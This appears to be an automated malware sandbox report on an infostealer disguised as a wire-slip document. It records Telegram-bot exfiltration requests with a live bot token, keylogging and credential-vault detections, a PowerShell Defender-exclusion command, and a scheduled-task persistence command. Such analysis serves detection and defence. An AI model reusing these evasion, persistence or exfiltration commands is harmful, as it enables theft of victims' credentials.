Source: global traffic	HTTP traffic detected: POST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd0a042708acedHost: api.telegram.orgContent-Length: 3951Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd09e9a634aff9Host: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive

Source: Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.000000000318E000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.00000000030C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: Wire slip account payable.pif.exe, EQVRGq.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Wire slip account payable.pif.exe, EQVRGq.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: Wire slip account payable.pif.exe, EQVRGq.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: Wire slip account payable.pif.exe, 00000000.00000002.1739600975.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 00000009.00000002.1783883607.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Wire slip account payable.pif.exe, 00000000.00000002.1742697410.0000000005750000.00000004.00000020.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.000000000318E000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.00000000030C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/
Source: Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003188000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument
Source: Wire slip account payable.pif.exe, EQVRGq.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49741 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, SKTzxzsJw.cs	.Net Code: rT6oF
Source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, SKTzxzsJw.cs	.Net Code: rT6oF

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Wire slip account payable.pif.exe.3e03808.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 0_2_0155D51C	0_2_0155D51C
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 0_2_0749CFF9	0_2_0749CFF9
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 0_2_07495758	0_2_07495758
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 0_2_07495768	0_2_07495768
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 0_2_07495330	0_2_07495330
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 0_2_07497278	0_2_07497278
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 0_2_07495FC7	0_2_07495FC7
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 0_2_07495FD8	0_2_07495FD8
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 0_2_07495BA0	0_2_07495BA0
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_011BEB38	8_2_011BEB38
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_011B4A70	8_2_011B4A70
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_011BACD9	8_2_011BACD9
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_011BDF70	8_2_011BDF70
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_011B3E58	8_2_011B3E58
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_011B41A0	8_2_011B41A0
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_06856610	8_2_06856610
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_068555A0	8_2_068555A0
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_06857DA0	8_2_06857DA0
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_0685B248	8_2_0685B248
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_06853070	8_2_06853070
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_0685C1A0	8_2_0685C1A0
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_068576C0	8_2_068576C0
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_06855CFB	8_2_06855CFB
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_0685E3C0	8_2_0685E3C0
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_06852348	8_2_06852348
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_06850040	8_2_06850040
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_06942648	8_2_06942648
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_0694EA68	8_2_0694EA68
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_06850016	8_2_06850016
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 9_2_00C0D51C	9_2_00C0D51C
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 9_2_06C1C3F9	9_2_06C1C3F9
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 9_2_06C15758	9_2_06C15758
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 9_2_06C15768	9_2_06C15768
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 9_2_06C17278	9_2_06C17278
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 9_2_06C15330	9_2_06C15330
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 9_2_06C15FC7	9_2_06C15FC7
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 9_2_06C15FD8	9_2_06C15FD8
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 9_2_06C15BA0	9_2_06C15BA0
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_02E441A0	14_2_02E441A0
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_02E44A70	14_2_02E44A70
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_02E4EB38	14_2_02E4EB38
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_02E43E58	14_2_02E43E58
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_02E4DF70	14_2_02E4DF70
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_06A26610	14_2_06A26610
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_06A255A0	14_2_06A255A0
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_06A27DA0	14_2_06A27DA0
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_06A2B24B	14_2_06A2B24B
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_06A23070	14_2_06A23070
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_06A2C1A0	14_2_06A2C1A0
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_06A276C0	14_2_06A276C0
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_06A25CFB	14_2_06A25CFB
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_06A2E3C0	14_2_06A2E3C0
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_06A22348	14_2_06A22348
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_06A20040	14_2_06A20040
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_06A20007	14_2_06A20007

Source: Wire slip account payable.pif.exe

Static PE information: invalid certificate

Source: Wire slip account payable.pif.exe, 00000000.00000002.1746285908.00000000077C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Wire slip account payable.pif.exe
Source: Wire slip account payable.pif.exe, 00000000.00000002.1738691173.00000000010BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Wire slip account payable.pif.exe
Source: Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename3f0b89ee-138d-4b54-97f8-124f3d6dbb52.exe4 vs Wire slip account payable.pif.exe
Source: Wire slip account payable.pif.exe, 00000000.00000002.1739600975.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename3f0b89ee-138d-4b54-97f8-124f3d6dbb52.exe4 vs Wire slip account payable.pif.exe
Source: Wire slip account payable.pif.exe, 00000000.00000002.1744164691.0000000005960000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Wire slip account payable.pif.exe
Source: Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Wire slip account payable.pif.exe
Source: Wire slip account payable.pif.exe, 00000008.00000002.4157285814.0000000000D58000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Wire slip account payable.pif.exe
Source: Wire slip account payable.pif.exe	Binary or memory string: OriginalFilenamezycH.exe6 vs Wire slip account payable.pif.exe

Source: Wire slip account payable.pif.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Wire slip account payable.pif.exe.3e03808.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: Wire slip account payable.pif.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EQVRGq.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, gL074BhmJSaIe9Ktd1.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, gL074BhmJSaIe9Ktd1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, gL074BhmJSaIe9Ktd1.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, gNRWAGnXV8menB1Yeo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, gNRWAGnXV8menB1Yeo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, gL074BhmJSaIe9Ktd1.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, gL074BhmJSaIe9Ktd1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, gL074BhmJSaIe9Ktd1.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/15@2/2

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe

File created: C:\Users\user\AppData\Roaming\EQVRGq.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Mutant created: \Sessions\1\BaseNamedObjects\mnwSasRZHhlnJVycRRnzapr
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe

File created: C:\Users\user\AppData\Local\Temp\tmp14C9.tmp

Jump to behavior

Source: Wire slip account payable.pif.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Wire slip account payable.pif.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Wire slip account payable.pif.exe

ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe

File read: C:\Users\user\Desktop\Wire slip account payable.pif.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Wire slip account payable.pif.exe "C:\Users\user\Desktop\Wire slip account payable.pif.exe"
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EQVRGq.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process created: C:\Users\user\Desktop\Wire slip account payable.pif.exe "C:\Users\user\Desktop\Wire slip account payable.pif.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\EQVRGq.exe C:\Users\user\AppData\Roaming\EQVRGq.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp25B1.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process created: C:\Users\user\AppData\Roaming\EQVRGq.exe "C:\Users\user\AppData\Roaming\EQVRGq.exe"
